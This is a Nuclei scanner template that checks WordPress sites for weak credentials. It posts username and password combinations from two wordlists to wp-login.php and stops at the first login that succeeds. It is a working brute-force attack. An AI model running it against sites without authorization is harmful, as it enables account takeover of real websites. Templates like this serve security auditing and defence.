id: wordpress-weak-credentials

info:
  name: WordPress - Weak Credentials
  author: evolutionsec
  severity: critical
  description: |
    Weak WordPress Credentials were discovered.
  reference:
    - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-1391
  metadata:
    max-request: 276
  tags: wordpress,default-login,fuzz,fuzzing

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{users}}&pwd={{passwords}}

    attack: clusterbomb
    payloads:
      users: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100f79d749a89171e06b99ce891fee9aeda61c7bb10197d64f56df6adcc16af6a6c02207154c1409bf301e85141215429b9cc6eb2ea01d6b65d96a07c493eb1d3af0581:922c64590222798bb761d5b6d8e72950